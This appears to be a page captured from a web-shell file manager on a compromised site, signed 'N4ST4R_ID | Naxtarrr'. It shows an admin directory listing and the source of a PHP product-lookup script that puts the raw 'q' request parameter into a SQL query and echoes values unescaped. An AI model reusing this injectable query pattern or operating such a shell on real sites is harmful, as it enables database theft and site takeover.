Submit
Path:
~
/
home
/
caratcollect
/
public_html
/
admin
/
ajax
/
File Content:
productAjax.php
<?php include("../library.php"); $q=$_GET['q']; $categoryId=$_SESSION['category']; ?> <label><b>Product Name</b></label> <select class="form-control" name="productId" requited> <option>select product Name</option> <?php $result=$mysql->m_Query("select * from tblproduct where categoryId=$categoryId && productId=$q"); while($row=$mysql->m_FetchObject()) { echo "<option value=$row->id>$row->productName</option>"; } ?> </select>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
auditAjax.php
0 bytes
0755
categoryAjax.php
664 bytes
0644
mobileNoAjax.php
204 bytes
0644
productAjax.php
510 bytes
0644
stateAjax.php
488 bytes
0644
N4ST4R_ID | Naxtarrr